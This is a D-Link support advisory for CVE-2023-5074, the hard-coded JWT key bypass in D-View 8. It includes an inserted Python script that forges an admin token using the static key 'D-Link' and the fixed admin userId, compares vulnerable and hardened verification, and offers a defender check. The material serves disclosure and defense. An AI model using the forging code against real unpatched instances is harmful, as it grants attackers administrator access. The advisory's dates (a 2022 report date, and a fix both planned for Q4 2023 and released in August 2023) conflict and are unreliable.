Support Announcement
(Non-US) D-View 8 : v2.0.1.28 and below : CVE-2023-5074 : Hard-coded JWT Key Authentication Bypass (Also See 2nd Reference)

Overview

On June 23, 2022, third-party security researchers from Tenable reported that D-Link D-View 8 v2.0.1.28 is affected by a hard-coded JWT key authentication bypass.

This was a known issue, previously reported by ZDI in v2.0.1.27 (see https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10332), with a fix under development for Q4 2023.

D-View 8 v2.0.1.89 was released on August 23, 2023, which mitigates the issue.

D-Link takes the issues of network security and user privacy very seriously. We have a dedicated task force and product management team on call to address evolving security issues and implement appropriate security measures.

Report information

         - Reported by Tenable Research

         - D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability

         - Details: CVE-2023-5074 (Tenable Research advisory)

                   D-View 8 uses a static key, the string "D-Link", to sign the JWT token used in user authentication.

                   D-View 8 supports login with an API key, but the API key supplied in the JWT token (accessToken) is
                   not checked if no API key is configured for the login user.

                   Upon D-View 8 installation, there is no API key configured for the default user 'admin'. In addition, the userId for the admin
                   user appears to remain the same (59171d56-e6b4-4789-90ff-a7a27fd48548) across installations. With a known JWT secret
                   key, an unauthenticated remote attacker can craft a valid JWT token and use the token to access protected APIs.
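The script below is an added example, not code from this advisory or from D-Link's product. It illustrates the two weaknesses described above in working form: a token minted under the static key "D-Link" for the constant admin userId passes a verifier that mirrors the flawed logic (the API-key claim is only compared when the user has one configured), while a hardened verifier with a per-installation random key and a mandatory API-key binding refuses it. It also contains a check, signed_with_static_key, that an operator can run on a captured accessToken to see whether an instance still signs with the hard-coded secret. The signing algorithm (HS256), the claim names userId and apiKey, and the in-memory user store are assumptions; the advisory only gives the key string and the admin userId. The second user and its API key are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Values taken from the advisory: the literal static key and the constant admin userId.
STATIC_KEY = b"D-Link"
ADMIN_USER_ID = "59171d56-e6b4-4789-90ff-a7a27fd48548"

# Constructed user store standing in for D-View's user records (assumption: one record
# per userId). A fresh install has no API key configured for 'admin', per the advisory.
OPS_USER_ID = "00000000-0000-4000-8000-000000000001"  # constructed second user
USERS = {
    ADMIN_USER_ID: {"name": "admin", "apiKey": None},
    OPS_USER_ID: {"name": "ops", "apiKey": "ops-api-key-constructed"},
}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint a compact JWT: b64url(header).b64url(claims).b64url(HMAC-SHA256). HS256 is an assumption."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Return the claims if token is a well-formed HS256 JWT signed with key, else None.
    The alg header is pinned to HS256 so 'none' or key-confusion tokens are refused."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
            return None
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(payload_b64))
        return claims if isinstance(claims, dict) else None
    except ValueError:  # wrong segment count, bad base64, bad UTF-8 or bad JSON
        return None


def signed_with_static_key(token: str) -> bool:
    """Defender check: a captured accessToken that verifies under the static key was
    issued by (or forged for) an instance still using the hard-coded secret."""
    return verify_hs256(token, STATIC_KEY) is not None


def _lookup(claims: dict) -> Optional[dict]:
    user_id = claims.get("userId")
    return USERS.get(user_id) if isinstance(user_id, str) else None


def vulnerable_authenticate(token: str) -> Optional[str]:
    """Mirrors the flawed logic the advisory describes: the key is the static string, and
    the apiKey claim is only compared when the user actually has an API key configured."""
    claims = verify_hs256(token, STATIC_KEY)
    user = _lookup(claims) if claims is not None else None
    if user is None:
        return None
    if user["apiKey"] is not None and claims.get("apiKey") != user["apiKey"]:
        return None
    return user["name"]  # admin has no API key, so nothing was checked beyond the static signature


def hardened_authenticate(token: str, install_key: bytes) -> Optional[str]:
    """Hardened variant: a per-installation random key, and API-key login is refused
    outright for a user who has no API key provisioned (no 'nothing to check' path)."""
    claims = verify_hs256(token, install_key)
    user = _lookup(claims) if claims is not None else None
    if user is None or user["apiKey"] is None:
        return None
    supplied = str(claims.get("apiKey", "")).encode()
    if not hmac.compare_digest(supplied, user["apiKey"].encode()):
        return None
    return user["name"]


def demo() -> dict:
    """Forge the admin token the advisory describes and run it through both checks."""
    forged = sign_hs256({"userId": ADMIN_USER_ID}, STATIC_KEY)
    install_key = secrets.token_bytes(32)  # what a fixed build should generate per install
    legit = sign_hs256({"userId": OPS_USER_ID, "apiKey": USERS[OPS_USER_ID]["apiKey"]}, install_key)
    return {
        "forged_signed_with_static_key": signed_with_static_key(forged),
        "vulnerable_accepts_forged": vulnerable_authenticate(forged),
        "hardened_accepts_forged": hardened_authenticate(forged, install_key),
        "hardened_accepts_legit": hardened_authenticate(legit, install_key),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

Running the script shows the forged token verifying under "D-Link" and being accepted as admin by the vulnerable routine, while the hardened routine rejects it and accepts only a token signed with the installation's own key for a user who has an API key bound. The practical takeaway for operators is the signed_with_static_key check: feed it an accessToken issued by your D-View 8 instance; if it returns True, the instance is still on the hard-coded key and must be updated to v2.0.1.89 or later.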


 

Affected Models

Model:            D-View 8
Software Version: v2.0.1.28 and below
Region:           Non-US
Fixed Release:    v2.0.1.89
Recommendation:   You must update via the application, or contact your regional technical support for license verification. Link: https://dview.dlink.com/
Last Updated:     09/22/2023

Regarding Security patch for your D-Link Devices

Firmware and software updates address the security vulnerabilities in affected D-Link devices. D-Link will update this page continually, and we strongly recommend that all users install the relevant updates.

Please note that this is a device beta software, beta firmware, or hot-fix release which is still undergoing final testing before its official release. The beta software, beta firmware, or hot-fix is provided on an "as is" and "as available" basis, and the user assumes all risk and liability for its use. D-Link does not provide any warranties, whether express or implied, as to the suitability or usability of the beta firmware. D-Link will not be liable for any loss, whether such loss is direct, indirect, special or consequential, suffered by any party as a result of their use of the beta firmware.

As there are different hardware revisions of our products, please check the hardware revision of your device before downloading the corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, it can also be found in the device web configuration.